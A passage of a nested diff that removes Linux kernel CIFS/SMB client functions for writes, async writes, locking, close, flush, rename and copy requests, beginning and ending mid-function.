+-		pSMB->OffsetHigh = cpu_to_le32(offset >> 32);
+-
+-	pSMB->Reserved = 0xFFFFFFFF;
+-	pSMB->WriteMode = 0;
+-	pSMB->Remaining = 0;
+-
+-	/* Can increase buffer size if buffer is big enough in some cases ie we
+-	can send more if LARGE_WRITE_X capability returned by the server and if
+-	our buffer is big enough or if we convert to iovecs on socket writes
+-	and eliminate the copy to the CIFS buffer */
+-	if (tcon->ses->capabilities & CAP_LARGE_WRITE_X) {
+-		bytes_sent = min_t(const unsigned int, CIFSMaxBufSize, count);
+-	} else {
+-		bytes_sent = (tcon->ses->server->maxBuf - MAX_CIFS_HDR_SIZE)
+-			 & ~0xFF;
+-	}
+-
+-	if (bytes_sent > count)
+-		bytes_sent = count;
+-	pSMB->DataOffset =
+-		cpu_to_le16(offsetof(struct smb_com_write_req, Data) - 4);
+-	if (buf)
+-		memcpy(pSMB->Data, buf, bytes_sent);
+-	else if (count != 0) {
+-		/* No buffer */
+-		cifs_buf_release(pSMB);
+-		return -EINVAL;
+-	} /* else setting file size with write of zero bytes */
+-	if (wct == 14)
+-		byte_count = bytes_sent + 1; /* pad */
+-	else /* wct == 12 */
+-		byte_count = bytes_sent + 5; /* bigger pad, smaller smb hdr */
+-
+-	pSMB->DataLengthLow = cpu_to_le16(bytes_sent & 0xFFFF);
+-	pSMB->DataLengthHigh = cpu_to_le16(bytes_sent >> 16);
+-	inc_rfc1001_len(pSMB, byte_count);
+-
+-	if (wct == 14)
+-		pSMB->ByteCount = cpu_to_le16(byte_count);
+-	else { /* old style write has byte count 4 bytes earlier
+-		  so 4 bytes pad  */
+-		struct smb_com_writex_req *pSMBW =
+-			(struct smb_com_writex_req *)pSMB;
+-		pSMBW->ByteCount = cpu_to_le16(byte_count);
+-	}
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_writes);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in write = %d\n", rc);
+-	} else {
+-		*nbytes = le16_to_cpu(pSMBr->CountHigh);
+-		*nbytes = (*nbytes) << 16;
+-		*nbytes += le16_to_cpu(pSMBr->Count);
+-
+-		/*
+-		 * Mask off high 16 bits when bytes written as returned by the
+-		 * server is greater than bytes requested by the client. Some
+-		 * OS/2 servers are known to set incorrect CountHigh values.
+-		 */
+-		if (*nbytes > count)
+-			*nbytes &= 0xFFFF;
+-	}
+-
+-	cifs_buf_release(pSMB);
+-
+-	/* Note: On -EAGAIN error only caller can retry on handle based calls
+-		since file handle passed in no longer valid */
+-
+-	return rc;
+-}
+-
+-/*
+- * Check the mid_state and signature on received buffer (if any), and queue the
+- * workqueue completion task.
+- */
+-static void
+-cifs_writev_callback(struct mid_q_entry *mid)
+-{
+-	struct cifs_writedata *wdata = mid->callback_data;
+-	struct cifs_tcon *tcon = tlink_tcon(wdata->cfile->tlink);
+-	unsigned int written;
+-	WRITE_RSP *smb = (WRITE_RSP *)mid->resp_buf;
+-	struct cifs_credits credits = { .value = 1, .instance = 0 };
+-
+-	switch (mid->mid_state) {
+-	case MID_RESPONSE_RECEIVED:
+-		wdata->result = cifs_check_receive(mid, tcon->ses->server, 0);
+-		if (wdata->result != 0)
+-			break;
+-
+-		written = le16_to_cpu(smb->CountHigh);
+-		written <<= 16;
+-		written += le16_to_cpu(smb->Count);
+-		/*
+-		 * Mask off high 16 bits when bytes written as returned
+-		 * by the server is greater than bytes requested by the
+-		 * client. OS/2 servers are known to set incorrect
+-		 * CountHigh values.
+-		 */
+-		if (written > wdata->bytes)
+-			written &= 0xFFFF;
+-
+-		if (written < wdata->bytes)
+-			wdata->result = -ENOSPC;
+-		else
+-			wdata->bytes = written;
+-		break;
+-	case MID_REQUEST_SUBMITTED:
+-	case MID_RETRY_NEEDED:
+-		wdata->result = -EAGAIN;
+-		break;
+-	default:
+-		wdata->result = -EIO;
+-		break;
+-	}
+-
+-	queue_work(cifsiod_wq, &wdata->work);
+-	release_mid(mid);
+-	add_credits(tcon->ses->server, &credits, 0);
+-}
+-
+-/* cifs_async_writev - send an async write, and set up mid to handle result */
+-int
+-cifs_async_writev(struct cifs_writedata *wdata,
+-		  void (*release)(struct kref *kref))
+-{
+-	int rc = -EACCES;
+-	WRITE_REQ *smb = NULL;
+-	int wct;
+-	struct cifs_tcon *tcon = tlink_tcon(wdata->cfile->tlink);
+-	struct kvec iov[2];
+-	struct smb_rqst rqst = { };
+-
+-	if (tcon->ses->capabilities & CAP_LARGE_FILES) {
+-		wct = 14;
+-	} else {
+-		wct = 12;
+-		if (wdata->offset >> 32 > 0) {
+-			/* can not handle big offset for old srv */
+-			return -EIO;
+-		}
+-	}
+-
+-	rc = small_smb_init(SMB_COM_WRITE_ANDX, wct, tcon, (void **)&smb);
+-	if (rc)
+-		goto async_writev_out;
+-
+-	smb->hdr.Pid = cpu_to_le16((__u16)wdata->pid);
+-	smb->hdr.PidHigh = cpu_to_le16((__u16)(wdata->pid >> 16));
+-
+-	smb->AndXCommand = 0xFF;	/* none */
+-	smb->Fid = wdata->cfile->fid.netfid;
+-	smb->OffsetLow = cpu_to_le32(wdata->offset & 0xFFFFFFFF);
+-	if (wct == 14)
+-		smb->OffsetHigh = cpu_to_le32(wdata->offset >> 32);
+-	smb->Reserved = 0xFFFFFFFF;
+-	smb->WriteMode = 0;
+-	smb->Remaining = 0;
+-
+-	smb->DataOffset =
+-	    cpu_to_le16(offsetof(struct smb_com_write_req, Data) - 4);
+-
+-	/* 4 for RFC1001 length + 1 for BCC */
+-	iov[0].iov_len = 4;
+-	iov[0].iov_base = smb;
+-	iov[1].iov_len = get_rfc1002_length(smb) + 1;
+-	iov[1].iov_base = (char *)smb + 4;
+-
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = 2;
+-	rqst.rq_pages = wdata->pages;
+-	rqst.rq_offset = wdata->page_offset;
+-	rqst.rq_npages = wdata->nr_pages;
+-	rqst.rq_pagesz = wdata->pagesz;
+-	rqst.rq_tailsz = wdata->tailsz;
+-
+-	cifs_dbg(FYI, "async write at %llu %u bytes\n",
+-		 wdata->offset, wdata->bytes);
+-
+-	smb->DataLengthLow = cpu_to_le16(wdata->bytes & 0xFFFF);
+-	smb->DataLengthHigh = cpu_to_le16(wdata->bytes >> 16);
+-
+-	if (wct == 14) {
+-		inc_rfc1001_len(&smb->hdr, wdata->bytes + 1);
+-		put_bcc(wdata->bytes + 1, &smb->hdr);
+-	} else {
+-		/* wct == 12 */
+-		struct smb_com_writex_req *smbw =
+-				(struct smb_com_writex_req *)smb;
+-		inc_rfc1001_len(&smbw->hdr, wdata->bytes + 5);
+-		put_bcc(wdata->bytes + 5, &smbw->hdr);
+-		iov[1].iov_len += 4; /* pad bigger by four bytes */
+-	}
+-
+-	kref_get(&wdata->refcount);
+-	rc = cifs_call_async(tcon->ses->server, &rqst, NULL,
+-			     cifs_writev_callback, NULL, wdata, 0, NULL);
+-
+-	if (rc == 0)
+-		cifs_stats_inc(&tcon->stats.cifs_stats.num_writes);
+-	else
+-		kref_put(&wdata->refcount, release);
+-
+-async_writev_out:
+-	cifs_small_buf_release(smb);
+-	return rc;
+-}
+-
+-int
+-CIFSSMBWrite2(const unsigned int xid, struct cifs_io_parms *io_parms,
+-	      unsigned int *nbytes, struct kvec *iov, int n_vec)
+-{
+-	int rc;
+-	WRITE_REQ *pSMB = NULL;
+-	int wct;
+-	int smb_hdr_len;
+-	int resp_buf_type = 0;
+-	__u32 pid = io_parms->pid;
+-	__u16 netfid = io_parms->netfid;
+-	__u64 offset = io_parms->offset;
+-	struct cifs_tcon *tcon = io_parms->tcon;
+-	unsigned int count = io_parms->length;
+-	struct kvec rsp_iov;
+-
+-	*nbytes = 0;
+-
+-	cifs_dbg(FYI, "write2 at %lld %d bytes\n", (long long)offset, count);
+-
+-	if (tcon->ses->capabilities & CAP_LARGE_FILES) {
+-		wct = 14;
+-	} else {
+-		wct = 12;
+-		if ((offset >> 32) > 0) {
+-			/* can not handle big offset for old srv */
+-			return -EIO;
+-		}
+-	}
+-	rc = small_smb_init(SMB_COM_WRITE_ANDX, wct, tcon, (void **) &pSMB);
+-	if (rc)
+-		return rc;
+-
+-	pSMB->hdr.Pid = cpu_to_le16((__u16)pid);
+-	pSMB->hdr.PidHigh = cpu_to_le16((__u16)(pid >> 16));
+-
+-	/* tcon and ses pointer are checked in smb_init */
+-	if (tcon->ses->server == NULL)
+-		return -ECONNABORTED;
+-
+-	pSMB->AndXCommand = 0xFF;	/* none */
+-	pSMB->Fid = netfid;
+-	pSMB->OffsetLow = cpu_to_le32(offset & 0xFFFFFFFF);
+-	if (wct == 14)
+-		pSMB->OffsetHigh = cpu_to_le32(offset >> 32);
+-	pSMB->Reserved = 0xFFFFFFFF;
+-	pSMB->WriteMode = 0;
+-	pSMB->Remaining = 0;
+-
+-	pSMB->DataOffset =
+-	    cpu_to_le16(offsetof(struct smb_com_write_req, Data) - 4);
+-
+-	pSMB->DataLengthLow = cpu_to_le16(count & 0xFFFF);
+-	pSMB->DataLengthHigh = cpu_to_le16(count >> 16);
+-	/* header + 1 byte pad */
+-	smb_hdr_len = be32_to_cpu(pSMB->hdr.smb_buf_length) + 1;
+-	if (wct == 14)
+-		inc_rfc1001_len(pSMB, count + 1);
+-	else /* wct == 12 */
+-		inc_rfc1001_len(pSMB, count + 5); /* smb data starts later */
+-	if (wct == 14)
+-		pSMB->ByteCount = cpu_to_le16(count + 1);
+-	else /* wct == 12 */ /* bigger pad, smaller smb hdr, keep offset ok */ {
+-		struct smb_com_writex_req *pSMBW =
+-				(struct smb_com_writex_req *)pSMB;
+-		pSMBW->ByteCount = cpu_to_le16(count + 5);
+-	}
+-	iov[0].iov_base = pSMB;
+-	if (wct == 14)
+-		iov[0].iov_len = smb_hdr_len + 4;
+-	else /* wct == 12 pad bigger by four bytes */
+-		iov[0].iov_len = smb_hdr_len + 8;
+-
+-	rc = SendReceive2(xid, tcon->ses, iov, n_vec + 1, &resp_buf_type, 0,
+-			  &rsp_iov);
+-	cifs_small_buf_release(pSMB);
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_writes);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error Write2 = %d\n", rc);
+-	} else if (resp_buf_type == 0) {
+-		/* presumably this can not happen, but best to be safe */
+-		rc = -EIO;
+-	} else {
+-		WRITE_RSP *pSMBr = (WRITE_RSP *)rsp_iov.iov_base;
+-		*nbytes = le16_to_cpu(pSMBr->CountHigh);
+-		*nbytes = (*nbytes) << 16;
+-		*nbytes += le16_to_cpu(pSMBr->Count);
+-
+-		/*
+-		 * Mask off high 16 bits when bytes written as returned by the
+-		 * server is greater than bytes requested by the client. OS/2
+-		 * servers are known to set incorrect CountHigh values.
+-		 */
+-		if (*nbytes > count)
+-			*nbytes &= 0xFFFF;
+-	}
+-
+-	free_rsp_buf(resp_buf_type, rsp_iov.iov_base);
+-
+-	/* Note: On -EAGAIN error only caller can retry on handle based calls
+-		since file handle passed in no longer valid */
+-
+-	return rc;
+-}
+-
+-int cifs_lockv(const unsigned int xid, struct cifs_tcon *tcon,
+-	       const __u16 netfid, const __u8 lock_type, const __u32 num_unlock,
+-	       const __u32 num_lock, LOCKING_ANDX_RANGE *buf)
+-{
+-	int rc = 0;
+-	LOCK_REQ *pSMB = NULL;
+-	struct kvec iov[2];
+-	struct kvec rsp_iov;
+-	int resp_buf_type;
+-	__u16 count;
+-
+-	cifs_dbg(FYI, "cifs_lockv num lock %d num unlock %d\n",
+-		 num_lock, num_unlock);
+-
+-	rc = small_smb_init(SMB_COM_LOCKING_ANDX, 8, tcon, (void **) &pSMB);
+-	if (rc)
+-		return rc;
+-
+-	pSMB->Timeout = 0;
+-	pSMB->NumberOfLocks = cpu_to_le16(num_lock);
+-	pSMB->NumberOfUnlocks = cpu_to_le16(num_unlock);
+-	pSMB->LockType = lock_type;
+-	pSMB->AndXCommand = 0xFF; /* none */
+-	pSMB->Fid = netfid; /* netfid stays le */
+-
+-	count = (num_unlock + num_lock) * sizeof(LOCKING_ANDX_RANGE);
+-	inc_rfc1001_len(pSMB, count);
+-	pSMB->ByteCount = cpu_to_le16(count);
+-
+-	iov[0].iov_base = (char *)pSMB;
+-	iov[0].iov_len = be32_to_cpu(pSMB->hdr.smb_buf_length) + 4 -
+-			 (num_unlock + num_lock) * sizeof(LOCKING_ANDX_RANGE);
+-	iov[1].iov_base = (char *)buf;
+-	iov[1].iov_len = (num_unlock + num_lock) * sizeof(LOCKING_ANDX_RANGE);
+-
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_locks);
+-	rc = SendReceive2(xid, tcon->ses, iov, 2, &resp_buf_type,
+-			  CIFS_NO_RSP_BUF, &rsp_iov);
+-	cifs_small_buf_release(pSMB);
+-	if (rc)
+-		cifs_dbg(FYI, "Send error in cifs_lockv = %d\n", rc);
+-
+-	return rc;
+-}
+-
+-int
+-CIFSSMBLock(const unsigned int xid, struct cifs_tcon *tcon,
+-	    const __u16 smb_file_id, const __u32 netpid, const __u64 len,
+-	    const __u64 offset, const __u32 numUnlock,
+-	    const __u32 numLock, const __u8 lockType,
+-	    const bool waitFlag, const __u8 oplock_level)
+-{
+-	int rc = 0;
+-	LOCK_REQ *pSMB = NULL;
+-/*	LOCK_RSP *pSMBr = NULL; */ /* No response data other than rc to parse */
+-	int bytes_returned;
+-	int flags = 0;
+-	__u16 count;
+-
+-	cifs_dbg(FYI, "CIFSSMBLock timeout %d numLock %d\n",
+-		 (int)waitFlag, numLock);
+-	rc = small_smb_init(SMB_COM_LOCKING_ANDX, 8, tcon, (void **) &pSMB);
+-
+-	if (rc)
+-		return rc;
+-
+-	if (lockType == LOCKING_ANDX_OPLOCK_RELEASE) {
+-		/* no response expected */
+-		flags = CIFS_NO_SRV_RSP | CIFS_NON_BLOCKING | CIFS_OBREAK_OP;
+-		pSMB->Timeout = 0;
+-	} else if (waitFlag) {
+-		flags = CIFS_BLOCKING_OP; /* blocking operation, no timeout */
+-		pSMB->Timeout = cpu_to_le32(-1);/* blocking - do not time out */
+-	} else {
+-		pSMB->Timeout = 0;
+-	}
+-
+-	pSMB->NumberOfLocks = cpu_to_le16(numLock);
+-	pSMB->NumberOfUnlocks = cpu_to_le16(numUnlock);
+-	pSMB->LockType = lockType;
+-	pSMB->OplockLevel = oplock_level;
+-	pSMB->AndXCommand = 0xFF;	/* none */
+-	pSMB->Fid = smb_file_id; /* netfid stays le */
+-
+-	if ((numLock != 0) || (numUnlock != 0)) {
+-		pSMB->Locks[0].Pid = cpu_to_le16(netpid);
+-		/* BB where to store pid high? */
+-		pSMB->Locks[0].LengthLow = cpu_to_le32((u32)len);
+-		pSMB->Locks[0].LengthHigh = cpu_to_le32((u32)(len>>32));
+-		pSMB->Locks[0].OffsetLow = cpu_to_le32((u32)offset);
+-		pSMB->Locks[0].OffsetHigh = cpu_to_le32((u32)(offset>>32));
+-		count = sizeof(LOCKING_ANDX_RANGE);
+-	} else {
+-		/* oplock break */
+-		count = 0;
+-	}
+-	inc_rfc1001_len(pSMB, count);
+-	pSMB->ByteCount = cpu_to_le16(count);
+-
+-	if (waitFlag)
+-		rc = SendReceiveBlockingLock(xid, tcon, (struct smb_hdr *) pSMB,
+-			(struct smb_hdr *) pSMB, &bytes_returned);
+-	else
+-		rc = SendReceiveNoRsp(xid, tcon->ses, (char *)pSMB, flags);
+-	cifs_small_buf_release(pSMB);
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_locks);
+-	if (rc)
+-		cifs_dbg(FYI, "Send error in Lock = %d\n", rc);
+-
+-	/* Note: On -EAGAIN error only caller can retry on handle based calls
+-	since file handle passed in no longer valid */
+-	return rc;
+-}
+-
+-int
+-CIFSSMBPosixLock(const unsigned int xid, struct cifs_tcon *tcon,
+-		const __u16 smb_file_id, const __u32 netpid,
+-		const loff_t start_offset, const __u64 len,
+-		struct file_lock *pLockData, const __u16 lock_type,
+-		const bool waitFlag)
+-{
+-	struct smb_com_transaction2_sfi_req *pSMB  = NULL;
+-	struct smb_com_transaction2_sfi_rsp *pSMBr = NULL;
+-	struct cifs_posix_lock *parm_data;
+-	int rc = 0;
+-	int timeout = 0;
+-	int bytes_returned = 0;
+-	int resp_buf_type = 0;
+-	__u16 params, param_offset, offset, byte_count, count;
+-	struct kvec iov[1];
+-	struct kvec rsp_iov;
+-
+-	cifs_dbg(FYI, "Posix Lock\n");
+-
+-	rc = small_smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB);
+-
+-	if (rc)
+-		return rc;
+-
+-	pSMBr = (struct smb_com_transaction2_sfi_rsp *)pSMB;
+-
+-	params = 6;
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Reserved2 = 0;
+-	param_offset = offsetof(struct smb_com_transaction2_sfi_req, Fid) - 4;
+-	offset = param_offset + params;
+-
+-	count = sizeof(struct cifs_posix_lock);
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	pSMB->MaxDataCount = cpu_to_le16(1000); /* BB find max SMB from sess */
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	if (pLockData)
+-		pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_FILE_INFORMATION);
+-	else
+-		pSMB->SubCommand = cpu_to_le16(TRANS2_SET_FILE_INFORMATION);
+-	byte_count = 3 /* pad */  + params + count;
+-	pSMB->DataCount = cpu_to_le16(count);
+-	pSMB->ParameterCount = cpu_to_le16(params);
+-	pSMB->TotalDataCount = pSMB->DataCount;
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	pSMB->ParameterOffset = cpu_to_le16(param_offset);
+-	/* SMB offsets are from the beginning of SMB which is 4 bytes in, after RFC1001 field */
+-	parm_data = (struct cifs_posix_lock *)
+-			(((char *)pSMB) + offset + 4);
+-
+-	parm_data->lock_type = cpu_to_le16(lock_type);
+-	if (waitFlag) {
+-		timeout = CIFS_BLOCKING_OP; /* blocking operation, no timeout */
+-		parm_data->lock_flags = cpu_to_le16(1);
+-		pSMB->Timeout = cpu_to_le32(-1);
+-	} else
+-		pSMB->Timeout = 0;
+-
+-	parm_data->pid = cpu_to_le32(netpid);
+-	parm_data->start = cpu_to_le64(start_offset);
+-	parm_data->length = cpu_to_le64(len);  /* normalize negative numbers */
+-
+-	pSMB->DataOffset = cpu_to_le16(offset);
+-	pSMB->Fid = smb_file_id;
+-	pSMB->InformationLevel = cpu_to_le16(SMB_SET_POSIX_LOCK);
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-	if (waitFlag) {
+-		rc = SendReceiveBlockingLock(xid, tcon, (struct smb_hdr *) pSMB,
+-			(struct smb_hdr *) pSMBr, &bytes_returned);
+-	} else {
+-		iov[0].iov_base = (char *)pSMB;
+-		iov[0].iov_len = be32_to_cpu(pSMB->hdr.smb_buf_length) + 4;
+-		rc = SendReceive2(xid, tcon->ses, iov, 1 /* num iovecs */,
+-				&resp_buf_type, timeout, &rsp_iov);
+-		pSMBr = (struct smb_com_transaction2_sfi_rsp *)rsp_iov.iov_base;
+-	}
+-	cifs_small_buf_release(pSMB);
+-
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in Posix Lock = %d\n", rc);
+-	} else if (pLockData) {
+-		/* lock structure can be returned on get */
+-		__u16 data_offset;
+-		__u16 data_count;
+-		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-
+-		if (rc || get_bcc(&pSMBr->hdr) < sizeof(*parm_data)) {
+-			rc = -EIO;      /* bad smb */
+-			goto plk_err_exit;
+-		}
+-		data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
+-		data_count  = le16_to_cpu(pSMBr->t2.DataCount);
+-		if (data_count < sizeof(struct cifs_posix_lock)) {
+-			rc = -EIO;
+-			goto plk_err_exit;
+-		}
+-		parm_data = (struct cifs_posix_lock *)
+-			((char *)&pSMBr->hdr.Protocol + data_offset);
+-		if (parm_data->lock_type == cpu_to_le16(CIFS_UNLCK))
+-			pLockData->fl_type = F_UNLCK;
+-		else {
+-			if (parm_data->lock_type ==
+-					cpu_to_le16(CIFS_RDLCK))
+-				pLockData->fl_type = F_RDLCK;
+-			else if (parm_data->lock_type ==
+-					cpu_to_le16(CIFS_WRLCK))
+-				pLockData->fl_type = F_WRLCK;
+-
+-			pLockData->fl_start = le64_to_cpu(parm_data->start);
+-			pLockData->fl_end = pLockData->fl_start +
+-				(le64_to_cpu(parm_data->length) ?
+-				 le64_to_cpu(parm_data->length) - 1 : 0);
+-			pLockData->fl_pid = -le32_to_cpu(parm_data->pid);
+-		}
+-	}
+-
+-plk_err_exit:
+-	free_rsp_buf(resp_buf_type, rsp_iov.iov_base);
+-
+-	/* Note: On -EAGAIN error only caller can retry on handle based calls
+-	   since file handle passed in no longer valid */
+-
+-	return rc;
+-}
+-
+-
+-int
+-CIFSSMBClose(const unsigned int xid, struct cifs_tcon *tcon, int smb_file_id)
+-{
+-	int rc = 0;
+-	CLOSE_REQ *pSMB = NULL;
+-	cifs_dbg(FYI, "In CIFSSMBClose\n");
+-
+-/* do not retry on dead session on close */
+-	rc = small_smb_init(SMB_COM_CLOSE, 3, tcon, (void **) &pSMB);
+-	if (rc == -EAGAIN)
+-		return 0;
+-	if (rc)
+-		return rc;
+-
+-	pSMB->FileID = (__u16) smb_file_id;
+-	pSMB->LastWriteTime = 0xFFFFFFFF;
+-	pSMB->ByteCount = 0;
+-	rc = SendReceiveNoRsp(xid, tcon->ses, (char *) pSMB, 0);
+-	cifs_small_buf_release(pSMB);
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_closes);
+-	if (rc) {
+-		if (rc != -EINTR) {
+-			/* EINTR is expected when user ctl-c to kill app */
+-			cifs_dbg(VFS, "Send error in Close = %d\n", rc);
+-		}
+-	}
+-
+-	/* Since session is dead, file will be closed on server already */
+-	if (rc == -EAGAIN)
+-		rc = 0;
+-
+-	return rc;
+-}
+-
+-int
+-CIFSSMBFlush(const unsigned int xid, struct cifs_tcon *tcon, int smb_file_id)
+-{
+-	int rc = 0;
+-	FLUSH_REQ *pSMB = NULL;
+-	cifs_dbg(FYI, "In CIFSSMBFlush\n");
+-
+-	rc = small_smb_init(SMB_COM_FLUSH, 1, tcon, (void **) &pSMB);
+-	if (rc)
+-		return rc;
+-
+-	pSMB->FileID = (__u16) smb_file_id;
+-	pSMB->ByteCount = 0;
+-	rc = SendReceiveNoRsp(xid, tcon->ses, (char *) pSMB, 0);
+-	cifs_small_buf_release(pSMB);
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_flushes);
+-	if (rc)
+-		cifs_dbg(VFS, "Send error in Flush = %d\n", rc);
+-
+-	return rc;
+-}
+-
+-int
+-CIFSSMBRename(const unsigned int xid, struct cifs_tcon *tcon,
+-	      const char *from_name, const char *to_name,
+-	      struct cifs_sb_info *cifs_sb)
+-{
+-	int rc = 0;
+-	RENAME_REQ *pSMB = NULL;
+-	RENAME_RSP *pSMBr = NULL;
+-	int bytes_returned;
+-	int name_len, name_len2;
+-	__u16 count;
+-	int remap = cifs_remap(cifs_sb);
+-
+-	cifs_dbg(FYI, "In CIFSSMBRename\n");
+-renameRetry:
+-	rc = smb_init(SMB_COM_RENAME, 1, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	pSMB->BufferFormat = 0x04;
+-	pSMB->SearchAttributes =
+-	    cpu_to_le16(ATTR_READONLY | ATTR_HIDDEN | ATTR_SYSTEM |
+-			ATTR_DIRECTORY);
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len = cifsConvertToUTF16((__le16 *) pSMB->OldFileName,
+-					      from_name, PATH_MAX,
+-					      cifs_sb->local_nls, remap);
+-		name_len++;	/* trailing null */
+-		name_len *= 2;
+-		pSMB->OldFileName[name_len] = 0x04;	/* pad */
+-	/* protocol requires ASCII signature byte on Unicode string */
+-		pSMB->OldFileName[name_len + 1] = 0x00;
+-		name_len2 =
+-		    cifsConvertToUTF16((__le16 *)&pSMB->OldFileName[name_len+2],
+-				       to_name, PATH_MAX, cifs_sb->local_nls,
+-				       remap);
+-		name_len2 += 1 /* trailing null */  + 1 /* Signature word */ ;
+-		name_len2 *= 2;	/* convert to bytes */
+-	} else {
+-		name_len = copy_path_name(pSMB->OldFileName, from_name);
+-		name_len2 = copy_path_name(pSMB->OldFileName+name_len+1, to_name);
+-		pSMB->OldFileName[name_len] = 0x04;  /* 2nd buffer format */
+-		name_len2++;	/* signature byte */
+-	}
+-
+-	count = 1 /* 1st signature byte */  + name_len + name_len2;
+-	inc_rfc1001_len(pSMB, count);
+-	pSMB->ByteCount = cpu_to_le16(count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_renames);
+-	if (rc)
+-		cifs_dbg(FYI, "Send error in rename = %d\n", rc);
+-
+-	cifs_buf_release(pSMB);
+-
+-	if (rc == -EAGAIN)
+-		goto renameRetry;
+-
+-	return rc;
+-}
+-
+-int CIFSSMBRenameOpenFile(const unsigned int xid, struct cifs_tcon *pTcon,
+-		int netfid, const char *target_name,
+-		const struct nls_table *nls_codepage, int remap)
+-{
+-	struct smb_com_transaction2_sfi_req *pSMB  = NULL;
+-	struct smb_com_transaction2_sfi_rsp *pSMBr = NULL;
+-	struct set_file_rename *rename_info;
+-	char *data_offset;
+-	char dummy_string[30];
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	int len_of_str;
+-	__u16 params, param_offset, offset, count, byte_count;
+-
+-	cifs_dbg(FYI, "Rename to File by handle\n");
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, pTcon, (void **) &pSMB,
+-			(void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	params = 6;
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	param_offset = offsetof(struct smb_com_transaction2_sfi_req, Fid) - 4;
+-	offset = param_offset + params;
+-
+-	/* SMB offsets are from the beginning of SMB which is 4 bytes in, after RFC1001 field */
+-	data_offset = (char *)(pSMB) + offset + 4;
+-	rename_info = (struct set_file_rename *) data_offset;
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	pSMB->MaxDataCount = cpu_to_le16(1000); /* BB find max SMB from sess */
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_FILE_INFORMATION);
+-	byte_count = 3 /* pad */  + params;
+-	pSMB->ParameterCount = cpu_to_le16(params);
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	pSMB->ParameterOffset = cpu_to_le16(param_offset);
+-	pSMB->DataOffset = cpu_to_le16(offset);
+-	/* construct random name ".cifs_tmp<inodenum><mid>" */
+-	rename_info->overwrite = cpu_to_le32(1);
+-	rename_info->root_fid  = 0;
+-	/* unicode only call */
+-	if (target_name == NULL) {
+-		sprintf(dummy_string, "cifs%x", pSMB->hdr.Mid);
+-		len_of_str =
+-			cifsConvertToUTF16((__le16 *)rename_info->target_name,
+-					dummy_string, 24, nls_codepage, remap);
+-	} else {
+-		len_of_str =
+-			cifsConvertToUTF16((__le16 *)rename_info->target_name,
+-					target_name, PATH_MAX, nls_codepage,
+-					remap);
+-	}
+-	rename_info->target_name_len = cpu_to_le32(2 * len_of_str);
+-	count = sizeof(struct set_file_rename) + (2 * len_of_str);
+-	byte_count += count;
+-	pSMB->DataCount = cpu_to_le16(count);
+-	pSMB->TotalDataCount = pSMB->DataCount;
+-	pSMB->Fid = netfid;
+-	pSMB->InformationLevel =
+-		cpu_to_le16(SMB_SET_FILE_RENAME_INFORMATION);
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-	rc = SendReceive(xid, pTcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	cifs_stats_inc(&pTcon->stats.cifs_stats.num_t2renames);
+-	if (rc)
+-		cifs_dbg(FYI, "Send error in Rename (by file handle) = %d\n",
+-			 rc);
+-
+-	cifs_buf_release(pSMB);
+-
+-	/* Note: On -EAGAIN error only caller can retry on handle based calls
+-		since file handle passed in no longer valid */
+-
+-	return rc;
+-}
+-
+-int
+-CIFSSMBCopy(const unsigned int xid, struct cifs_tcon *tcon,
+-	    const char *fromName, const __u16 target_tid, const char *toName,
+-	    const int flags, const struct nls_table *nls_codepage, int remap)
+-{
+-	int rc = 0;
+-	COPY_REQ *pSMB = NULL;
+-	COPY_RSP *pSMBr = NULL;
+-	int bytes_returned;
+-	int name_len, name_len2;
+-	__u16 count;
+-
+-	cifs_dbg(FYI, "In CIFSSMBCopy\n");
+-copyRetry:
+-	rc = smb_init(SMB_COM_COPY, 1, tcon, (void **) &pSMB,
+-			(void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	pSMB->BufferFormat = 0x04;
+-	pSMB->Tid2 = target_tid;
+-
+-	pSMB->Flags = cpu_to_le16(flags & COPY_TREE);
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len = cifsConvertToUTF16((__le16 *) pSMB->OldFileName,
+-					      fromName, PATH_MAX, nls_codepage,
+-					      remap);
